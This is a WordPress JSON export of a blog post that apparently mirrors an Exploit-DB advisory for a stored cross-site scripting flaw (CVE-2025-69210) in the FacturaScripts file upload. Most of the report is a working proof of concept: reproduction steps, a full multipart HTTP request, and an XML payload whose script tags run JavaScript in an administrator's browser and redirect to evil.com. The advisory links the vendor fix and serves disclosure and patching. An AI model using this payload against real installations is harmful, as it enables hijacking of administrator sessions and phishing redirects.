{"id":50098,"date":"2026-04-29T04:40:43","date_gmt":"2026-04-29T04:40:43","guid":{"rendered":"http:\/\/localhost\/?p=50098"},"modified":"2026-04-29T04:40:43","modified_gmt":"2026-04-29T04:40:43","slug":"facturascripts-202543-xss","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=50098","title":{"rendered":"FacturaScripts 2025.43 &#8211; XSS_EDB-ID:52517"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-29T09:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: FacturaScripts 2025.43 &#8211; XSS Date: 30-12-2025 Exploit Author: VETTRIVEL U Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006 Vendor Homepage: https:\/\/facturascripts.com\/ Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;FacturaScripts 2025.43 &#8211; XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52517&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69210&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit Title: FacturaScripts 2025.43 &#8211; XSS\\r\\n# Date: 30-12-2025\\r\\n# Exploit Author: VETTRIVEL U \\r\\n# Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006\\r\\n# Vendor Homepage: https:\/\/facturascripts.com\/\\r\\n# Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts\\r\\n# Affected Versions: \\u003c= 2025.4, = 2025.11, = 2025.41, = 2025.43\\r\\n# Fixes: https:\/\/github.com\/NeoRazorX\/facturascripts\/commit\/e908ade21c84bdc9d51190057482316730c66146\\r\\n# Patched Releases: https:\/\/github.com\/NeoRazorX\/facturascripts\/releases\/tag\/v2025.7\\r\\n# Tested on: Windows\\r\\n# GitHub Advisories: https:\/\/github.com\/advisories\/GHSA-2267-xqcf-gw2m\\r\\n# CVE 
Reference: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-69210\\r\\n# CVE: CVE-2025-69210\\r\\n\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\r\\n\\r\\n\\r\\n## Description\\r\\n\\r\\nA stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality.\\r\\nAuthenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed.\\r\\nBecause product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator\u2019s browser session.\\r\\n\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\r\\n\\r\\n## Steps to Reproduce\\r\\n\\r\\n1. Log in as a normal user.\\r\\n2. Navigate to the Warehouse \u2192 Products section:\\r\\n   \\r\\n   \\thttp:\/\/localhost:8888\/ListProducto\\r\\n\\r\\n3. Click New Product, enter the details (Example below), and save:\\r\\n\\r\\n\\r\\n\\tProduct Reference: XSS POC\\r\\n\\tDescription: Stored XSS PoC\\r\\n\\r\\n\\r\\n4. Go to the Files section of the product.\\r\\n5. Upload a crafted XML file containing JavaScript OR intercept the upload request using Burp Suite.\\r\\n6. 
Modify the intercepted request body and inject the following payload as the uploaded XML file:\\r\\n\\r\\n\\r\\nPOST \/EditProducto?code=10 HTTP\/1.1\\r\\nHost: localhost:8888\\r\\nContent-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundaryPU65l8Am0L64rWdo\\r\\nCookie: [authenticated session cookies]\\r\\n&#8212;&#8212;\\r\\n&#8212;&#8212;WebKitFormBoundaryPU65l8Am0L64rWdo\\r\\nContent-Disposition: form-data; name=\\&#8221;new-files[]\\&#8221;; filename=\\&#8221;xss.xml\\&#8221;\\r\\nContent-Type: text\/xml\\r\\n\\u003chtml\\u003e\\r\\n   \\u003chead\\u003e\\u003c\/head\\u003e\\r\\n   \\u003cbody\\u003e\\r\\n      \\u003csomething:script xmlns:something=\\&#8221;\\r\\n      \\u003csomething:script xmlns:something=\\&#8221;http:\/\/www.w3.org\/1999\/xhtml\\&#8221;\\u003e\\r\\n         alert(\\&#8221;XSS\\&#8221;);\\r\\n         if (confirm(\\&#8221;Now Redirect POC\\&#8221;)) {\\r\\n         top.location.href = \\&#8221;https:\/\/evil.com\\&#8221;;\\r\\n         }\\r\\n      \\u003c\/something:script\\u003e\\r\\n      \\u003ca:script xmlns:a=\\&#8221;\\r\\n      \\u003ca:script xmlns:a=\\&#8221;http:\/\/www.w3.org\/1999\/xhtml\\&#8221;\\u003e\\r\\n         alert(\\&#8221;XSS\\&#8221;);\\r\\n         if (confirm(\\&#8221;Now Redirect POC\\&#8221;)) {\\r\\n         location.href = \\&#8221;https:\/\/evil.com\\&#8221;;\\r\\n         }\\r\\n      \\u003c\/a:script\\u003e\\r\\n      \\u003cinfo\\u003e\\r\\n         \\u003cname\\u003e\\r\\n            \\u003cvalue\\u003e\\r\\n               \\u003c![CDATA[\\r\\n                  \\u003cscript\\u003e\\r\\n                  alert(\\&#8221;XSS\\&#8221;);\\r\\n                  if (confirm(\\&#8221;Now Redirect POC\\&#8221;)) {\\r\\n                  window.location = \\&#8221;https:\/\/evil.com\\&#8221;;\\r\\n                  }\\r\\n                  \\u003c\/script\\u003e\\r\\n                  ]]\\u003e\\r\\n            \\u003c\/value\\u003e\\r\\n         \\u003c\/name\\u003e\\r\\n         
\\u003cdescription\\u003e\\r\\n            \\u003cvalue\\u003eHello\\u003c\/value\\u003e\\r\\n         \\u003c\/description\\u003e\\r\\n         \\u003curl\\u003e\\r\\n            \\u003cvalue\\u003ehttp:\/\/google.com\\u003c\/value\\u003e\\r\\n         \\u003c\/url\\u003e\\r\\n      \\u003c\/info\\u003e\\r\\n   \\u003c\/body\\u003e\\r\\n\\u003c\/html\\u003e\\r\\n&#8212;&#8212;\\r\\n&#8212;&#8212;WebKitFormBoundaryPU65l8Am0L64rWdo&#8211;\\r\\n\\r\\n\\r\\n6. Forward the request and save the product file.\\r\\n7. Open the uploaded file using the generated file URL, for example:\\r\\n\\r\\n\\r\\n\\thttp:\/\/localhost:8888\/MyFiles\/2025\/12\/9.xml?myft=2043dbb7389b8208d24f4dafb046ee5d71acbda9\\r\\n\\r\\n\\r\\nObserve that:\\r\\nA popup with the message \u201cXSS\u201d is displayed.\\r\\nUpon clicking OK, the browser redirects to an attacker-controlled domain.\\r\\n\\r\\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\r\\n\\r\\n## Impact\\r\\n- Arbitrary JavaScript execution in the victim\u2019s browser.\\r\\n- Products created by normal users are visible to administrators. 
When an admin opens the malicious file, the payload executes in the admin\u2019s session.\\r\\n- Phishing \\u0026 Redirect Abuse: Attackers can redirect victims to malicious domains.\\r\\n- If extended, this vulnerability could be chained with:\\r\\n    &#8211; Session hijacking\\r\\n    &#8211; CSRF token theft\\r\\n    &#8211; Admin API abuse\\r\\n\\r\\n- Trust Boundary Violation: User-controlled XML content is rendered as active content without sanitization.\\r\\n\\r\\n## Reference\\r\\n\\r\\nhttps:\/\/github.com\/vettrivel007\/CVE-Disclosures\/blob\/main\/CVE-2025-69210.md\\r\\nhttps:\/\/github.com\/advisories\/GHSA-2267-xqcf-gw2m\\r\\n\\r\\n\\r\\n## Author Details: \\r\\n\\r\\nExploit Author: VETTRIVEL U \\r\\nAuthor Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006\\r\\nGitHub Profile: https:\/\/github.com\/vettrivel007\/&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/www.exploit-db.com\/raw\/52517&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:5.4,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:R\/S:C\/C:L\/I:L\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8
221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.exploit-db.com\/exploits\/52517&#8243;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-29T09:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: FacturaScripts 2025.43 &#8211; XSS Date: 30-12-2025 Exploit Author: VETTRIVEL U Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006 Vendor Homepage: https:\/\/facturascripts.com\/ Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;FacturaScripts 2025.43 &#8211; XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52517&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69210&#8243;],&#8221;sourceData&#8221;:&#8221;# 
Exploit&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,82,12,40,21,13,7,11,5],"class_list":["post-50098","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-54","tag-exploit","tag-exploitdb","tag-medium","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=50098\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-29T09:27:57&#8243;,&#8221;description&#8221;:&#8221;Exploit Title: FacturaScripts 2025.43 &#8211; XSS Date: 30-12-2025 Exploit Author: VETTRIVEL U Author Profile: https:\/\/www.linkedin.com\/in\/vettrivel2006 Vendor Homepage: https:\/\/facturascripts.com\/ Software Link: https:\/\/github.com\/NeoRazorX\/facturascripts&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-29T00:00:00&#8243;,&#8221;type&#8221;:&#8221;exploitdb&#8221;,&#8221;title&#8221;:&#8221;FacturaScripts 2025.43 &#8211; 
XSS&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;EDB-ID:52517&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-69210&#8243;],&#8221;sourceData&#8221;:&#8221;# Exploit...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=50098\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T04:40:43+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"FacturaScripts 2025.43 &#8211; 
XSS_EDB-ID:52517\",\"datePublished\":\"2026-04-29T04:40:43+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\"},\"wordCount\":1016,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-5.4\",\"exploit\",\"exploitdb\",\"MEDIUM\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50098#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\",\"name\":\"FacturaScripts 2025.43 - XSS_EDB-ID:52517 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-29T04:40:43+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=50098\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=50098#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"FacturaScripts 2025.43 &#8211; XSS_EDB-ID:52517\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero 
redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->"}